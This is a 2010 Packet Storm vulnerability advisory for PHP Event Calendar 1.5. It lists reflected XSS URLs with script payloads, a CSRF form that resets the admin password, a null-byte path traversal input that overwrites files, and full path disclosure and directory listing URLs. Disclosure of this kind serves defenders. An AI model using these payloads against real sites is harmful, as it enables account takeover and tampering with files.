PHP Event Calendar 1.5 Cross Site Request Forgery / Cross Site Scripting / Traversal

2010-06-25T00:00:00
ID PACKETSTORM:90972
Type packetstorm
Reporter cp77fk4r
Modified 2010-06-25T00:00:00

Description

                                        
                                            `  
  
# Title: PHP Event Calendar <= v1.5 Multiple Vulnerabilities  
# Author: cp77fk4r | Empty0pagE[SHIFT+2]gmail.com | www.DigitalWhisper.co.il  
# Software Link: http://www.softcomplex.com/download.html  
# Version: <= v1.5  
# Tested on: Apache2+PHP5 on Win32  
#  
#  
##[Cross Site Scripting]*  
(Cross-Site Scripting attacks are a type of injection problem, in which  
malicious scripts are injected into the otherwise benign and trusted web  
sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web  
application to send malicious code, generally in the form of a browser side  
script, to a different end user. Flaws that allow these attacks to succeed  
are quite widespread and occur anywhere a web application uses input from a  
user in the output it generates without validating or encoding it (OWASP))  
-Reflected:  
http://[SERVER]/[DIR]/cl_files/index.php (POST/Login name)  
http://  
[SERVER]/[DIR]/cl_files/index.php?page=a&name=%22%3E%3Cscript%3Ealert(1)%3C/script%3E  
http://  
[SERVER]/[DIR]/cl_files/index.php?CLd=21&CLm=06&CLy=2010&name=[CALENDAR_NAME]&type=list&action=t&page=%22%3E%3Cscript%3Ealert(1)%3C/script%3E  
http://  
[SERVER]/[DIR]/cl_files/index.php?CLd=21&CLm=06&CLy=2010&name=[CALENDAR_NAME]&type=&action=e&err='%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C'  
http://  
[SERVER]/[DIR]/cl_files/index.php?CLd=23&CLm=06&CLy=2010%22%3E%3Cscript%3Ealert(1)%3C/script%3E&name=[CALENDAR_NAME]&type=&action=e  
#  
-Permenent:  
http://[SERVER]/[DIR]/cl_files/index.php?page=e  
(Title; Body; Background color; Background image; Align;)  
#  
##[Cross Site Request Forgery]*  
(CSRF is an attack which forces an end user to execute unwanted actions on a  
web application in which he/she is currently authenticated. With a little  
help of social engineering (like sending a link via email/chat), an attacker  
may force the users of a web application to execute actions of the  
attacker's choosing. A successful CSRF exploit can compromise end user data  
and operation in case of normal user. If the targeted end user is the  
administrator account, this can compromise the entire web application.)  
(OWASP))  
#  
http://[SERVER]/[DIR]/cl_files/index.php?page=a  
#  
Change "Admin" Password PoC:  
<form name=user method=post action="http://  
[SERVER]/[DIR]/cl_files/index.php?page=a&name=[CALENDAR_NAME]">  
<input type="hidden" name="page" value="a">  
<input type=hidden value="admin" name=l class=inpt>  
<input type=hidden value="1234" name=p class=inpt>  
<input type=hidden value="1234" name=p2 class=inpt>  
</form>  
  
#  
##[Local File Rewriting+Path Traversal with NBP]**  
(A Path Traversal attack aims to access files and directories that are  
stored outside the web root folder. By browsing the application, the  
attacker looks for absolute links to files stored on the web server. By  
manipulating variables that reference files with “dot-dot-slash (../)”  
sequences and its variations, it may be possible to access arbitrary files  
and directories stored on file system, including application source code,  
configuration and critical system files, limited by system operational  
access control. The attacker uses “../” sequences to move up to root  
directory, thus permitting navigation through the file system. (OWASP))  
#  
http://[SERVER]/[DIR]/cl_files/index.php  
"Title:" \..\..\..\..\..\..\1.txt%00  
#  
Will rewrite %HOMEDRIVER%\1.txt file.  
#  
##[FULL PATH DICSLOSURE]  
(Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the  
path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain  
vulnerabilities, such as using the load_file() (within a SQL Injection)  
query to view the page source, require the attacker to have the full path to  
the file they wish to view. (OWASP))  
#  
-Fatal error: Call to a member function read_file()/load_item() on a  
non-object:  
http://[SERVER]/[DIR]/cl_files/admin.php  
http://[SERVER]/[DIR]/cl_files/auth.php  
http://[SERVER]/[DIR]/cl_files/edit.php  
http://[SERVER]/[DIR]/cl_files/templ.php  
http://[SERVER]/[DIR]/cl_files/view.php  
http://[SERVER]/[DIR]/cl_files/index.php?page=a&name=cP  
http://[SERVER]/[DIR]/show.php  
#  
-Fatal error: Call to undefined function:  
http://[SERVER]/[DIR]/cl_files/property.php  
http://[SERVER]/[DIR]/cl_files/user.php  
#  
-Fatal error: Maximum execution time of 60 seconds exceeded:  
http://[SERVER]/[DIR]/?CLm[CALENDAR_NAME]=1333333337  
#  
-Parse error: syntax error:  
http://[SERVER]/[DIR]/cl_files/data/groups.php  
http://[SERVER]/[DIR]/cl_files/data/users.php  
#  
##[Directory Listing]  
#  
http://[SERVER]/[DIR]/cl_files/data/  
#  
*The victim must be logged in.  
**The attacker must be logged in.  
# [e0f]  
  
  
  
`